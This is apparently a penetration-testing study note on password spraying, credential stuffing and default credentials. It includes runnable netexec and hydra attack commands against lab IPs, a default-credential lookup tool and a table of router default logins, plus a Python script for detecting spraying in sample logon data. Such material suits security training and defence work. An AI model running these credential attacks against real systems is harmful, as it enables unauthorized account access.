
# Password Spraying, Credential Stuffing & Default Credentials

**Reference:**

<https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv>

### Password Spraying

Testing **one password against many users**. Effective when admins set default passwords for new accounts that users forget to change.

Unlike brute-force (many passwords → one user), spraying avoids account lockout by keeping the number of attempts per account below the lockout threshold.

```bash
# Spray one password across all users on a subnet
netexec smb 10.100.38.0/24 -u usernames.list -p 'ChangeMe123!'

# Spray across Active Directory
netexec smb <DC-IP> -u usernames.list -p 'ChangeMe123!' --continue-on-success
```

**Tools by target:**

| Target           | Tool               |
| ---------------- | ------------------ |
| Web applications | Burp Suite         |
| Active Directory | NetExec / Kerbrute |
| Network services | Hydra / NetExec    |

> **Real scenario:** Admin sets up 50 new accounts all with `ChangeMe123!`. You spray it — even if 2 users never changed it, you're in.
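Because a spray stays below the per-account lockout threshold, per-user failure counters never fire; a defender has to aggregate failed logons by source instead. The following is an added example, not code from the original page or from any tool it names; it runs over a constructed set of failed-logon events, and the thresholds (5 distinct users, 3 attempts per user, 10-minute window) are assumed values to tune for your own environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon events (not real logs): (timestamp, source IP, username).
# 10.0.0.5 sprays one password across many users; 10.0.0.9 brute-forces a single account;
# 10.0.0.7 is one benign typo.
EVENTS = [
    ("2024-01-01 09:00:01", "10.0.0.5", "alice"),
    ("2024-01-01 09:00:02", "10.0.0.5", "bob"),
    ("2024-01-01 09:00:03", "10.0.0.5", "carol"),
    ("2024-01-01 09:00:04", "10.0.0.5", "dave"),
    ("2024-01-01 09:00:05", "10.0.0.5", "erin"),
    ("2024-01-01 09:00:06", "10.0.0.5", "frank"),
    ("2024-01-01 09:01:00", "10.0.0.9", "admin"),
    ("2024-01-01 09:01:01", "10.0.0.9", "admin"),
    ("2024-01-01 09:01:02", "10.0.0.9", "admin"),
    ("2024-01-01 09:01:03", "10.0.0.9", "admin"),
    ("2024-01-01 09:01:04", "10.0.0.9", "admin"),
    ("2024-01-01 09:01:05", "10.0.0.9", "admin"),
    ("2024-01-01 10:30:00", "10.0.0.7", "alice"),
]


def classify_sources(events, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Classify each source IP by its failed-logon pattern inside a sliding window.

    Returns {src_ip: "spray" | "brute_force" | None}.
    - "brute_force": one account tried more than max_per_user times (per-account lockout would catch this)
    - "spray": at least min_users distinct accounts, none above max_per_user (only the per-source view catches it)
    Thresholds are assumed defaults; tune them to your lockout policy and log volume.
    """
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user))
    verdicts = {}
    for src, rows in by_src.items():
        rows.sort()
        verdict = None
        for i, (start, _) in enumerate(rows):
            counts = defaultdict(int)
            for ts, user in rows[i:]:          # every failure within `window` of this start
                if ts - start > window:
                    break
                counts[user] += 1
            if max(counts.values()) > max_per_user:
                verdict = "brute_force"
                break
            if len(counts) >= min_users:
                verdict = "spray"
                break
        verdicts[src] = verdict
    return verdicts


if __name__ == "__main__":
    print(classify_sources(EVENTS))  # {'10.0.0.5': 'spray', '10.0.0.9': 'brute_force', '10.0.0.7': None}
```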

***

### Credential Stuffing

Using **leaked username:password pairs** from one breach to attack other services. Works because ~66% of users reuse passwords across platforms.

```bash
# -C flag = combo list (username:password format)
hydra -C user_pass.list ssh://10.100.38.23

# user_pass.list format:
# john:password123
# admin:letmein
# user:qwerty
```

**Difference from spraying:**

|        | Password Spraying              | Credential Stuffing    |
| ------ | ------------------------------ | ---------------------- |
| Input  | Many users + one password      | Leaked user:pass pairs |
| Source | Guessed/default passwords      | Breach databases       |
| Goal   | Find who didn't change default | Find password reuse    |

***

### Default Credentials

Many devices ship with default credentials admins forget to change — routers, firewalls, databases, IoT devices.

#### defaultcreds-cheat-sheet

```bash
# Install
pip3 install defaultcreds-cheat-sheet

# Search by product/vendor
creds search linksys
creds search cisco
creds search apache
```

#### Common router defaults

| Brand   | Default IP  | Username | Password |
| ------- | ----------- | -------- | -------- |
| 3Com    | 192.168.1.1 | admin    | Admin    |
| Belkin  | 192.168.2.1 | admin    | admin    |
| D-Link  | 192.168.0.1 | admin    | Admin    |
| Linksys | 192.168.1.1 | admin    | Admin    |
| Netgear | 192.168.0.1 | admin    | password |

#### Attack flow

```bash
# 1. Identify product on target network
# 2. Search default creds
creds search <product>

# 3. Build combo list and stuff
hydra -C default_creds.list ssh://10.100.38.23
hydra -C default_creds.list ftp://10.100.38.23
```

***

### Summary

| Technique           | What it is                         | Tool            |
| ------------------- | ---------------------------------- | --------------- |
| Password spraying   | One password → many users          | NetExec / Hydra |
| Credential stuffing | Leaked pairs → other services      | Hydra `-C`      |
| Default credentials | Known defaults → unchanged devices | `creds` + Hydra |
